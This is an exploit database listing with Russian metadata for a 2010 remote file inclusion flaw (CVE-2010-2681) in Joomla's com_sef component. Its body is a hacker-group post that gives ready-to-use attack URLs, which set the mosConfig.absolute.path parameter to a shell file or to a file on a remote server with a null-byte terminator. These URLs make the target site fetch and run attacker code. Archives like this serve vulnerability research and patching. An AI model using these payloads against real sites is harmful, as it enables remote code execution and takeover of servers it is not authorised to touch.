Exploit Joomla! Component com_sef - Remote File Inclusion

[Exploiter]

EDB-ID

14055

Проверка EDB

1. Пройдено

Автор

LI0N-PAL

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2010-2681

Дата публикации

2010-06-26

==========================================================
Joomla Component (com_sef) RFI
===========================================================

                                          WWw.HaCkTeacH.oRg/cc
                                                                                         
+===================================================================================+
[?]Joomla Component (com_sef) RFI
+===================================================================================+
    [?] My home:              [http://HaCkTeCh.Org/cc           ]
    [?] For Ask:              [[email protected]                   ]
    [?] Script:               [     joomla                ]
    [?] home Script           [ http://www.joomla.com/app             ]
    [?] Language:             [ PHP                              ]
    [?] Founder:              [ Li0n-PaL                         ]
    [?] Gr44tz to:            [ Pal-Li0n - Red-D3v1L - Shadow-D3v1L - All HaCkTeacH CreW ]

===[ Exploit  ]===
http://localhost/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=[shell.txt?]

DeMo ~

http://www.example.com/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://[remote-server]/[file]%00


EnJoY o_O

---------------------------------------------------------

./exit